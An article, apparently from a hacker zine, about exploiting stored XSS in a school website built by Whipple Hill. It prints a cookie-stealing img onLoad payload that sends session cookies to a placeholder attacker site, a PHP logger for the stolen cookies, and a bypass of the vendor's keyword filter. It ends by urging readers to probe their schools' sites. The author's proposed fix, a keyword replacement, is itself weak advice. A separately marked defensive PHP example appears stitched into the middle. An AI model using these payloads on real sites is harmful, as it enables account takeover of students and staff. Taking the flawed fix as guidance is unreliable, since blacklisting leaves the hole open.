Hacking Whipple Hill with XSS

by Azohko

My school recently redid its website with a new and shiny user interface created by a company called Whipple Hill (whipplehill.com).

This new website enables you to check your schedule online and create groups which could also create their own forums.  After minutes of poking around, I found these group forums were vulnerable to an XSS exploit.

By redirecting the user to my website with a cookie stealer on it, you would be able to replace your cookies with theirs and become logged in as them.

This code would redirect the user to my website by loading an image:

<img src="linkToAnImage" onLoad='javascript:document.location="www.ChangeToYourSite.com/logger.php?" + document.cookie'>

The above code then passes the cookie information on to this script, which logs the data into log.txt:

logger.php:

<?php

function logData() {
    $ipLog = "log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date = date("l dS of F Y h:i:s A");
    $log = fopen("$ipLog", "a+");
    fputs($log, "COOKIE STOLEN! REF: $referer| DATE: $date | COOKIE: $cookie \n");
    fclose($log);
}

logData();

?>

While the exploit was simple (they didn't filter any HTML at all), when I called them they didn't seem to think fixing it was a priority.

This was a major vulnerability among many of their websites and they never seemed to be in a hurry to fix it.  Finally, I got a message back responding to the exploit saying it was fixed.

Wrong.

Their amazing fix was to filter out the word document.cookie so the user couldn't steal cookies.

It took about two seconds to come up with new code to exploit this:

<img src="linkToAnImage" onLoad='javascript:document.location="www.ChangeToYourSite.com/logger.php?" + docudocument.cookiement.cookie'>

The difference here is that the filter only removes the inner document.cookie once, and what remains still forms: document.cookie

This problem could easily have been fixed by using another method of checking for XSS in PHP.

Instead of searching for and removing document.cookie, they should have found every instance of document.cookie and replaced it with " script" (with a leading space).

No harm could be done here, and this way people couldn't have harmless but annoying scripts running on the forums.

This could be done easily with the following PHP:

<?php
// Replace every occurrence of the keyword with " script" so the result is inert.
function filterText($text) {
    $searchFor = "document.cookie";
    $replaceWith = " script";
    return str_replace($searchFor, $replaceWith, $text);
}
?>
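As an added example that is not the article's code, the following PHP runs the article's bypass payload through the vendor-style single-pass removal, a repeated removal, and plain HTML output encoding, and reports what survives each one (the site URL inside the payload is the article's own placeholder).

```php
<?php
// Added example, not from the original article: compares the vendor's
// single-pass keyword removal with two alternatives. The sample input is
// the bypass payload quoted in the article; the URL is its placeholder.
$payload = '<img src="linkToAnImage" onLoad=\'javascript:document.location='
         . '"www.ChangeToYourSite.com/logger.php?" + docudocument.cookiement.cookie\'>';

// 1. Single-pass removal, as the vendor did. str_replace does not rescan
//    its result, so deleting the inner occurrence reassembles the keyword.
function naiveFilter(string $text): string
{
    return str_replace('document.cookie', '', $text);
}

// 2. Repeat until nothing changes. Closes this particular hole, but it is
//    still a blacklist: other DOM properties and event handlers pass through.
function repeatedFilter(string $text): string
{
    do {
        $before = $text;
        $text = str_replace('document.cookie', '', $text);
    } while ($text !== $before);
    return $text;
}

// 3. Output encoding: escape every character with meaning in HTML so the
//    browser renders the post as text and never sees a tag or handler.
function encodeForHtml(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

foreach (['naiveFilter', 'repeatedFilter', 'encodeForHtml'] as $fn) {
    $out = $fn($payload);
    $keywordSurvives = strpos($out, 'document.cookie') !== false ? 'yes' : 'no';
    $tagSurvives     = strpos($out, '<img') !== false ? 'yes' : 'no';
    printf("%-15s keyword present: %-3s  <img tag present: %s\n",
           $fn, $keywordSurvives, $tagSurvives);
}
```

The keyword surviving in the encoded output is the point: the browser receives it as literal text rather than as script, which is why encoding beats keyword blacklists. Marking the session cookie HttpOnly is a complementary server-side control that keeps page scripts from reading document.cookie at all.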

This new website my school bought cost them a lot and it amazes me that it would be vulnerable to something so simple.

Not only was the original exploit simple, but they failed to fix it successfully.  This is sad considering they are supposed to be professionals.  Check your school's websites for simple exploits.

You might get lucky like me.
